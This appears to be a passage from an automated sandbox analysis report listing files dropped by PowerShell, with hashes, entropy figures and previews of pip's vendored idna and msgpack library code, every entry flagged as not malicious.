                                                                                                                                                                                                                              Preview:........|.VfY..............................d.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.e.e.....d.e.e.d.f.....f.d...Z.d.e.d.e.d.e.f.d...Z.d.e.d.e.e.e.f.....f.d...Z.d.e.d.e.e.d.f.....d.e.f.d...Z.y.).a.....Given a list of integers, made up of (hopefully) a small number of long runs.of consecutive integers, compute a representation of the form.((start1, end1), (start2, end2) ...). Then answer the question "was x present.in the original list?" in time O(log(# runs)).......N)...List..Tuple..list_..return.c...........................t.........|.........}.g.}.d.}.t.........t.........|.................D.]V..}.|.d.z...t.........|.........k...r.|.|.....|.|.d.z.......d.z...k(..r..&|.|.d.z...|.d.z.....}.|.j...................t.........|.d.....|.d.....d.z.....................|.}..X..t.........|.........S.).a....Represent a list of integers as a sequence of ranges:. ((start_0, end_0), (start_1, end_1), ...), such that the original. integers are exactly those x such that start_i <= x < end_i for some i...
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):199
                                                                                                                                                                                                                              Entropy (8bit):4.991131996574806
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:yOtaCC9QetUw52KNdAreaM/ZSaYleH+nxt:3aCCCet+KNnaM/AaYkH+nxt
                                                                                                                                                                                                                              MD5:D5313BB84BEF28AA997C4DE7CA615158
                                                                                                                                                                                                                              SHA1:8EB59E7C5EAEB00AE4C44DB65FFB7E658DA3E2F0
                                                                                                                                                                                                                              SHA-256:054865A282C1924647EC6492234B443E2A9C60277CAF61F2E4FF8E99EE547D39
                                                                                                                                                                                                                              SHA-512:93310124E3842EAAE829AAD2CB2F72B9F729BF24EF142D7C406442337915BB7AE03DAB719FD593AA6B4B566D1BDFB9B3FD048BB28B14361B6B10A24481ED4130
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.Z.y.).z.3.4N)...__version__........NC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/idna/package_data.py..<module>r........s..............r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):158853
                                                                                                                                                                                                                              Entropy (8bit):4.650871642679174
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:wY6QckuXZ+ueb832Jh5KiSYy91/Sw6alS59gEy:wY+Xsut2Mld353lS59i
                                                                                                                                                                                                                              MD5:F478EEEFE047DC20E1D2B32448152C3D
                                                                                                                                                                                                                              SHA1:53645A92614714014D3D03CE821C9558623AB0E0
                                                                                                                                                                                                                              SHA-256:C31810A954C99EA8E893B3647FAB6B8312D0603531F60391E13EC27C819B0438
                                                                                                                                                                                                                              SHA-512:40CCDE853A330A81C0D3935179DD173548DC7EE141DF040F2AD4F5CD217443CEDD7F2FF2F3935EFCBE4537791A47891912FDA7B9F13645E95F70B4D49F69D4E7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.&........................L.....d.d.l.m.Z.m.Z.m.Z.....d.Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f...
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3374
                                                                                                                                                                                                                              Entropy (8bit):4.324117598852627
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:zgHX1R9X1AYUV+621jtcgClFimiThyh6216vtcgClFicvnGvqvdm6jp4:zmD9qYUVj8tzCfiVy8htzCfiPiFzjp4
                                                                                                                                                                                                                              MD5:5C337705B6B52FFBC366CCC545047204
                                                                                                                                                                                                                              SHA1:E89F71A15E20A81A7907AD9D71CC3EB069B298B3
                                                                                                                                                                                                                              SHA-256:EA5CB9A1D29FAABCAD293F7FED4AE51A49479DFD4348ADABF42E9C48CE2C6B6F
                                                                                                                                                                                                                              SHA-512:EDCDCE49046451F47AB445FC89F9DB0DB9F256301C4CB379627418B6E0F4A11D9F56E608BC1F5E223A4E1DFF3A66DC358B2C3DCD2EF98F3AD6BD5233464E6D73
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from .core import encode, decode, alabel, ulabel, IDNAError.import codecs.import re.from typing import Tuple, Optional.._unicode_dots_re = re.compile('[\u002e\u3002\uff0e\uff61]')..class Codec(codecs.Codec):.. def encode(self, data: str, errors: str = 'strict') -> Tuple[bytes, int]:. if errors != 'strict':. raise IDNAError('Unsupported error handling \"{}\"'.format(errors)).. if not data:. return b"", 0.. return encode(data), len(data).. def decode(self, data: bytes, errors: str = 'strict') -> Tuple[str, int]:. if errors != 'strict':. raise IDNAError('Unsupported error handling \"{}\"'.format(errors)).. if not data:. return '', 0.. return decode(data), len(data)..class IncrementalEncoder(codecs.BufferedIncrementalEncoder):. def _buffer_encode(self, data: str, errors: str, final: bool) -> Tuple[str, int]: # type: ignore. if errors != 'strict':. raise IDNAError('Unsupported e
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):321
                                                                                                                                                                                                                              Entropy (8bit):4.7067876381245375
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:1LcQlBKlbEYBFiZmbNdPl6rZ9v+jLqBAII6A0v+Fy6QyneAJWkwID/:1hK9EYBamvPl6FoTILmy6fnYHID/
                                                                                                                                                                                                                              MD5:F1FB109A7AFB20BB1A7F89FFF1691575
                                                                                                                                                                                                                              SHA1:12BCD91FCCF01F9C1199470D492033F7FE30DD18
                                                                                                                                                                                                                              SHA-256:D3FB0E114313E02570F5DA03DEFC91857F345F5F4FC2A168501B3B816B05304E
                                                                                                                                                                                                                              SHA-512:F9A433F13634B130434353BD2DDFDF48676D796EDBE59E2AB84CEA409EAAB771488BA6037347018914A7AB3866202AB4493E6E752538A23E9373C1EA2CB7E8F9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from .core import *.from .codec import *.from typing import Any, Union..def ToASCII(label: str) -> bytes:. return encode(label)..def ToUnicode(label: Union[bytes, bytearray]) -> str:. return decode(label)..def nameprep(s: Any) -> None:. raise NotImplementedError('IDNA 2008 does not utilise nameprep protocol')..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12950
                                                                                                                                                                                                                              Entropy (8bit):4.539838620477975
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Bhlub6yqUN+so0rOqyNt5mi1LAayFk0cy6RK7O7Ev9tissc5W9W6CxyaM98BxuSc:x5Nn1LAayFk0j6RgOEFycE9WA98i
                                                                                                                                                                                                                              MD5:437556EF7ED62E5A18D7ADDB84792FEB
                                                                                                                                                                                                                              SHA1:E7F7B95383DB46DC80AE3430571AA41098D45547
                                                                                                                                                                                                                              SHA-256:D49C5C8702B39310529FB47FA02135DA806EDDE56EC74573771A2598869DDB83
                                                                                                                                                                                                                              SHA-512:D775594A5B087207C3E46B9F971DA4C01F7E57FEDC507E5515A9874646E1F99E2F6D7C261969F030D19306DC491D86550DA7F9C422CFE9868A384AD4D4C26E83
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from . import idnadata.import bisect.import unicodedata.import re.from typing import Union, Optional.from .intranges import intranges_contain.._virama_combining_class = 9._alabel_prefix = b'xn--'._unicode_dots_re = re.compile('[\u002e\u3002\uff0e\uff61]')..class IDNAError(UnicodeError):. """ Base exception for all IDNA-encoding related problems """. pass...class IDNABidiError(IDNAError):. """ Exception when bidirectional requirements are not satisfied """. pass...class InvalidCodepoint(IDNAError):. """ Exception when a disallowed or unallocated codepoint is used """. pass...class InvalidCodepointContext(IDNAError):. """ Exception when the codepoint is not valid in the context it is used """. pass...def _combining_class(cp: int) -> int:. v = unicodedata.combining(chr(cp)). if v == 0:. if not unicodedata.name(chr(cp)):. raise ValueError('Unknown character in unicodedata'). return v..def _is_script(cp: str, script: str) -> bool:. retur
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44375
                                                                                                                                                                                                                              Entropy (8bit):3.449143830874114
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:SSIC4eK2B/A1eBCe9hLo2UEMaMLoBSpldLAP:SN2LBCT2UFzjK
                                                                                                                                                                                                                              MD5:4C7D5F44F040841EECFB482DFF535235
                                                                                                                                                                                                                              SHA1:BCD1CE54717D6C66895CAD7FD7E09D514D0EA404
                                                                                                                                                                                                                              SHA-256:C548EA2AA88957C1E8FD7CC1A40B6FE4916854F4AEA4AF92517BED8F28141EAC
                                                                                                                                                                                                                              SHA-512:1B3612690FF0382B772D093DDD62650127795DC5F39F09B04DA5DED993B3BEA1A7AAB41E86D9D7B10400C1B06C83D6E1440FDA11EB2F8A1D1787A302368CF9CC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# This file is automatically generated by tools/idna-data..__version__ = '15.0.0'.scripts = {. 'Greek': (. 0x37000000374,. 0x37500000378,. 0x37a0000037e,. 0x37f00000380,. 0x38400000385,. 0x38600000387,. 0x3880000038b,. 0x38c0000038d,. 0x38e000003a2,. 0x3a3000003e2,. 0x3f000000400,. 0x1d2600001d2b,. 0x1d5d00001d62,. 0x1d6600001d6b,. 0x1dbf00001dc0,. 0x1f0000001f16,. 0x1f1800001f1e,. 0x1f2000001f46,. 0x1f4800001f4e,. 0x1f5000001f58,. 0x1f5900001f5a,. 0x1f5b00001f5c,. 0x1f5d00001f5e,. 0x1f5f00001f7e,. 0x1f8000001fb5,. 0x1fb600001fc5,. 0x1fc600001fd4,. 0x1fd600001fdc,. 0x1fdd00001ff0,. 0x1ff200001ff5,. 0x1ff600001fff,. 0x212600002127,. 0xab650000ab66,. 0x101400001018f,. 0x101a0000101a1,. 0x1d2000001d246,. ),. 'Han': (. 0x2e800
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1881
                                                                                                                                                                                                                              Entropy (8bit):4.535141327144005
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:wicdAdy/ORhzgnc9SbrMvypDGS6vbqgCbHmSXikyXP:pc25YcUk0DGS6mgCbHmOPy/
                                                                                                                                                                                                                              MD5:F67C377C6AB481B1059598CA94AF5555
                                                                                                                                                                                                                              SHA1:0A271B1F7519EAD8D311EA333A457CF87CB13B74
                                                                                                                                                                                                                              SHA-256:601AF87D162E587EE44CA4B6B579458CCDB8645D4F76F722AFE6B2C278889EA8
                                                                                                                                                                                                                              SHA-512:ACBB2CEB84393BD8936297C47F781BB0E0348168763CE95786B2722EC4FE3B53A423F34CA89F9E245B1061657D4104F43D44DA2AF5D92225E4D1F2DF929C7A84
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""".Given a list of integers, made up of (hopefully) a small number of long runs.of consecutive integers, compute a representation of the form.((start1, end1), (start2, end2) ...). Then answer the question "was x present.in the original list?" in time O(log(# runs)).."""..import bisect.from typing import List, Tuple..def intranges_from_list(list_: List[int]) -> Tuple[int, ...]:. """Represent a list of integers as a sequence of ranges:. ((start_0, end_0), (start_1, end_1), ...), such that the original. integers are exactly those x such that start_i <= x < end_i for some i... Ranges are encoded as single integers (start << 32 | end), not as tuples.. """.. sorted_list = sorted(list_). ranges = []. last_write = -1. for i in range(len(sorted_list)):. if i+1 < len(sorted_list):. if sorted_list[i] == sorted_list[i+1]-1:. continue. current_range = sorted_list[last_write+1:i+1]. ranges.append(_encode_range(current_range[0
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21
                                                                                                                                                                                                                              Entropy (8bit):3.725650756112093
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:cvbLY:8vY
                                                                                                                                                                                                                              MD5:EA29A1CFBE870B8290517FFE92FF84E8
                                                                                                                                                                                                                              SHA1:F84B0D08EAF4F0C37D49E2D38340696C069A09E0
                                                                                                                                                                                                                              SHA-256:0BF8C7273997F0F238C6AD23A7399C4CCC696F9943B2AE28E55CB1433955AD91
                                                                                                                                                                                                                              SHA-512:33516A378DC2ECDA0ACE0764B31C2BD79EF0D1372CDCC69FD2EA8C4F316591C540F4FB058DAD3EA2881F74BE7ED5AF86799C1BB5C05E0D68595FD6D706B61B78
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:__version__ = '3.4'..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):206539
                                                                                                                                                                                                                              Entropy (8bit):4.5082399928374395
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:ZL4k79kavWxyf70AhNua/oRhQ+3+LNFs9Wg2HB1kSFL9ei4Sfvk75K+HQFYbuNQl:+kqavWxyf7ZcioH+LNFs9WRK9HSY6el
                                                                                                                                                                                                                              MD5:54F2B5946B1E36CA822E5116B2B40DB9
                                                                                                                                                                                                                              SHA1:B27C4B60A25B1B443CE9753E9C3BD572FF23CFA5
                                                                                                                                                                                                                              SHA-256:CEF8D9536E2CE7CFEE012F39D0C71DD0D9C3D17EFF802300323CD634879425D7
                                                                                                                                                                                                                              SHA-512:92F525191613875FF28E4CC5D9FCF3A574271E3EC60AAEF2A5BA26B397D254CE855280EB5EAD7F5A94C4ED407659196517CA97C1ECFC2546FB662C9BC310B696
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# This file is automatically generated by tools/idna-data.# vim: set fileencoding=utf-8 :..from typing import List, Tuple, Union..."""IDNA Mapping Table from UTS46."""...__version__ = '15.0.0'.def _seg_0() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]:. return [. (0x0, '3'),. (0x1, '3'),. (0x2, '3'),. (0x3, '3'),. (0x4, '3'),. (0x5, '3'),. (0x6, '3'),. (0x7, '3'),. (0x8, '3'),. (0x9, '3'),. (0xA, '3'),. (0xB, '3'),. (0xC, '3'),. (0xD, '3'),. (0xE, '3'),. (0xF, '3'),. (0x10, '3'),. (0x11, '3'),. (0x12, '3'),. (0x13, '3'),. (0x14, '3'),. (0x15, '3'),. (0x16, '3'),. (0x17, '3'),. (0x18, '3'),. (0x19, '3'),. (0x1A, '3'),. (0x1B, '3'),. (0x1C, '3'),. (0x1D, '3'),. (0x1E, '3'),. (0x1F, '3'),. (0x20, '3'),. (0x21, '3'),. (0x22, '3'),. (0x23, '3'),. (0x24, '3'),. (0x25, '3'),. (0x26, '3'),. (0x27, '3'),. (0x28, '3'),. (0x29, '3'),. (0x2A, '3'),. (0x2B,
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1132
                                                                                                                                                                                                                              Entropy (8bit):4.813088046705428
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:zpXICnA4tZLewVxpXbeYpXKpXB+x8+XN5o6sTr:hIwNRXbeQXKpXB+xXoPX
                                                                                                                                                                                                                              MD5:AD506184C261EFECCA01568AD5395258
                                                                                                                                                                                                                              SHA1:A7EB25558D5795088015103FA486716CDD6AAB67
                                                                                                                                                                                                                              SHA-256:8721A196799C264C6BC8904A0B75F9167129877EF9910A0BFE61BC2D952E5E06
                                                                                                                                                                                                                              SHA-512:F5F13C168501467A8A081A782C6B86202A304DDC4DEAAD17D2D3347E1A3229B279653D6343A72267E4540ACAE0615490DBE711AAA28AD9578C5A40B691EC7A13
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# coding: utf-8.from .exceptions import *.from .ext import ExtType, Timestamp..import os.import sys...version = (1, 0, 5).__version__ = "1.0.5"...if os.environ.get("MSGPACK_PUREPYTHON") or sys.version_info[0] == 2:. from .fallback import Packer, unpackb, Unpacker.else:. try:. from ._cmsgpack import Packer, unpackb, Unpacker. except ImportError:. from .fallback import Packer, unpackb, Unpacker...def pack(o, stream, **kwargs):. """. Pack object `o` and write it to `stream`.. See :class:`Packer` for options.. """. packer = Packer(**kwargs). stream.write(packer.pack(o))...def packb(o, **kwargs):. """. Pack object `o` and return packed bytes.. See :class:`Packer` for options.. """. return Packer(**kwargs).pack(o)...def unpack(stream, **kwargs):. """. Unpack an object from `stream`... Raises `ExtraData` when `stream` contains extra bytes.. See :class:`Unpacker` for options.. """. data = stream.read(). return unpackb
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1814
                                                                                                                                                                                                                              Entropy (8bit):5.478888203766933
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:cGd+dNXriDWeQXASYbbxX5N/yuvGhxg6Bkr8R2:caA5riqxASY395RjGfJmG2
                                                                                                                                                                                                                              MD5:471FF6E2ACE507DBDF3DEE4D5E35CD1B
                                                                                                                                                                                                                              SHA1:B0184690BA5069E3F92A39736BCFE535DCD5FDEF
                                                                                                                                                                                                                              SHA-256:689B04B9D62C312C1130F8B1AA03250D4ABBD879ABB0153E988983CAB0433CE9
                                                                                                                                                                                                                              SHA-512:1D245F4169F6125365608B6BF7AE028AB77844314C5EBE400E094E12A6EAB68B11AEFC2AB394A2F3018D9D24171B72807DF3D0D3692F3CCE0D8D8AB261A915ED
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vfl...............................d.d.l.....d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.Z.d.Z.e.j...................j...................d.........s.e.j...................d.....d.k(..r.d.d.l.m.Z.m.Z.m.Z...n...d.d.l.m.Z.m.Z.m.Z...d...Z.d...Z.d...Z.e.Z.e.Z.e.Z.e.Z.y.#.e.$.r...d.d.l.m.Z.m.Z.m.Z...Y..#w.x.Y.w.)......)...*)...ExtType..Timestamp.....N).r....r.........z.1.0.5..MSGPACK_PUREPYTHON.....)...Packer..unpackb..Unpackerc.....................Z.....t.........d.i.|.....}.|.j...................|.j...................|...................y.).zX. Pack object `o` and write it to `stream`.. See :class:`Packer` for options.. N..).r......write..pack)...o..stream..kwargs..packers.... .MC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/msgpack/__init__.pyr....r........s%..............f....F....L.L.......Q.... .....c.....................6.....t.........d.i.|.....j...................|.........S.).zW. Pack object `o` and return packed bytes.. See :class:`Packer` for options..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2008
                                                                                                                                                                                                                              Entropy (8bit):4.970841839302561
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:hY1zaZ5gUyHetDVUGXVV8Vd6n7yJ6pXig:ozaZ5g0tDVUGlm67y6og
                                                                                                                                                                                                                              MD5:C15F1B421F64842D8C9363B1FB5FD110
                                                                                                                                                                                                                              SHA1:2E3CEC6A6957F6F563440D81DBBFFB70682C5BA9
                                                                                                                                                                                                                              SHA-256:73CCD71297E912A0914CD83B95FC29898CBD7F16F7F72F95893C91269727C82B
                                                                                                                                                                                                                              SHA-512:C57CC51128F39FD21EDA4FEB9D30013FCF8266C02B5A79F312C2BF4405D2DB321944A1A2B5BFA2B2067D229DAA349290078FFD54CECE1A73A4C27C066AFC8C89
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf9................................G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.e.........Z...G.d...d.e.e.........Z.e.Z...G.d...d.e.........Z.e.Z.e.Z.e.Z.y.).c...........................e.Z.d.Z.d.Z.y.)...UnpackExceptionz.Base class for some exceptions raised while unpacking... NOTE: unpack may raise exception other than subclass of. UnpackException. If you want to catch all error, catch. Exception instead.. N....__name__..__module__..__qualname__..__doc__........OC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/msgpack/exceptions.pyr....r........s...........r....r....c...........................e.Z.d.Z.y.)...BufferFullN..r....r....r....r....r....r....r....r..................r....r....c...........................e.Z.d.Z.y.)...OutOfDataNr....r....r....r....r....r........r....r....r....c...........................e.Z.d.Z.d.Z.y.)...FormatErrorz.Invalid msgpack formatNr....r....r....r....r....r........s........ r....r....c.....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8651
                                                                                                                                                                                                                              Entropy (8bit):5.299489972613402
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:46VDAG+hKi+JcOLBiY/egh87z7lY471fre+jrk+NlyrOQW9Mm4O3BKX5iAXVMo8I:46hATCJdLoY/EjphHk+SfeoixocvpO
                                                                                                                                                                                                                              MD5:2FC2155B5339C5857669771D55FD3EDF
                                                                                                                                                                                                                              SHA1:4F7E170F4851F781D70316D5357CA3E95FE99D8C
                                                                                                                                                                                                                              SHA-256:2D8F627C148CB3CA964BE2E9F354628CC9B475A2F9C0E1F67B710BA9C9F45C7C
                                                                                                                                                                                                                              SHA-512:458EEC9FC370DD602DAF0C2FF9A8A858755F49D1EDD9A87722F96D32D3A0E95C5E75D8F86ED61E3F7C890CA1C388515F5647032B2722E82D470F25C29D8CE7FC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................$.....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j...................d.....d.k(..Z.e.r.e.e.f.Z.d.Z.n.e.Z...e.j...................j...................Z...G.d...d...e.d.d.................Z...G.d...d.e.........Z.y.#.e.$.r%....e.j.....................e.j...................d.................Z.Y..Gw.x.Y.w.)......)...namedtupleN.....c.....................".......e.Z.d.Z.d.Z...f.d...Z...x.Z.S.)...ExtTypez'ExtType represents ext type in msgpack.c.............................t.........|.t.................s.t.........d...........t.........|.t.................s.t.........d...........d.|.c.x.k...r.d.k...s.t.........d.............t.........d...........t.........t.........|.....|.|.|.........S.).Nz.code must be intz.data must be bytesr.........z.code must be 0~127)...isinstance..int..TypeError..bytes..ValueError..superr......__new__)...cls..code..data..__class__s.... ..HC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/msgpack/ext.pyr....z.ExtType.__new__...
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):43559
                                                                                                                                                                                                                              Entropy (8bit):5.227885518763657
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:rkq+7mSm2+hwOux59RlC5wd75/TdHOWauaI:rkqHSL+E9RlN95/TdZapI
                                                                                                                                                                                                                              MD5:930942632877DCC89E7098B79D3DA594
                                                                                                                                                                                                                              SHA1:68F99623A79AA7012A664BE602C8912EFEC6BC56
                                                                                                                                                                                                                              SHA-256:92179286044E846A856763BF45C437A72D07A0B62933F890AFF2ABCBB4444B27
                                                                                                                                                                                                                              SHA-512:F2EDEFC9C5BB5E621B70871837D43563809AE5457841A9153CCE14B15E879BC7356AEBAF6153488AAB6E9DB9DC2F3081B4872567F9B971FA62F89BE4DB102F1E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.e.j...................d.....d.k(..Z.e.r.e.e.f.Z.d...Z.n.e.Z.e.Z.e.Z.d...Z.e.j...................d.k...r.e.Z.d...Z.n.d...Z...e.e.d.........r.d.d.l.m.Z.....d.d.l.m.Z...d.Z...G.d...d.e.........Z.n.d.Z.d.d.l.m.Z...d...Z.d.d.l.m.Z.m Z m!Z!m"Z"m#Z#..d.d.l$m%Z%m&Z&..d.Z'd.Z(d.Z)d.Z*d.Z+d.Z,d.Z-d.Z.d.Z/d.Z0d.Z1e2e3f.d...Z4d...Z5d...Z6e.j...................d.k...r.dLd...Z7n.e.jp..................Z7d Z9i.d!d.e9e/f...d"d.d#e/f...d$d.d%e/f...d&d.d'e0f...d(d.d)e0f...d*d.d+e0f...d,d-..d.d/..d0d.e9f...d1d2..d3d4..d5d6..d7d8..d9d:..d;d<..d=d>..d?d.d@e0f...d.dAe0f.d.dBe0f.dCdDe0f.dEdFe0f.d.e9e.f.d.d#e.f.d.d%e.f.d.d#e,f.d.d%e,f.d.d#e-f.d.d%e-f.dG....Z:..G.dH..dIe.........Z;..G.dJ..dKe.........Z<y.#.e.$.r...d.d.l.m.Z...Y.....w.x.Y.w.)Mz.Fallback pure Python implementation of msgpack.....)...datetimeN.....c.....................".....|.j...........................S...N)...iteritems....ds.... .MC:\Users\xbov\Desktop\pyops\Lib\site-p
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1081
                                                                                                                                                                                                                              Entropy (8bit):4.655454758782356
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:CjUM+GDEXASXGgzmapB/HY5byVM0v+sAVSLXEpFDSuOm5VCXUMp1ABeaHPzgzLlz:CjDEXAczO50WsFEpFmB4VCVArX052S
                                                                                                                                                                                                                              MD5:741A33042796DCC6A1C101898F38E87E
                                                                                                                                                                                                                              SHA1:4CEAE08460A40ACDF926DBB2908FF87AB6309E4E
                                                                                                                                                                                                                              SHA-256:7424D67A2F1DA64ACCB100DC8D093BE004E5F47B08047D326EDF3338F36A3187
                                                                                                                                                                                                                              SHA-512:24578D126892750EBAACED8A9977B01E84F3804CB484EBCDB120CEAD612EB2517A0CC4504FAE41971C05FD39DA65225931E868498F4605BDA8178462EE56024A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:class UnpackException(Exception):. """Base class for some exceptions raised while unpacking... NOTE: unpack may raise exception other than subclass of. UnpackException. If you want to catch all error, catch. Exception instead.. """...class BufferFull(UnpackException):. pass...class OutOfData(UnpackException):. pass...class FormatError(ValueError, UnpackException):. """Invalid msgpack format"""...class StackError(ValueError, UnpackException):. """Too nested"""...# Deprecated. Use ValueError instead.UnpackValueError = ValueError...class ExtraData(UnpackValueError):. """ExtraData is raised when there is trailing data... This exception is raised while only one-shot (not streaming). unpack.. """.. def __init__(self, unpacked, extra):. self.unpacked = unpacked. self.extra = extra.. def __str__(self):. return "unpack(b) received extra data."...# Deprecated. Use Exception instead to catch all exception during packing..PackExc
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6079
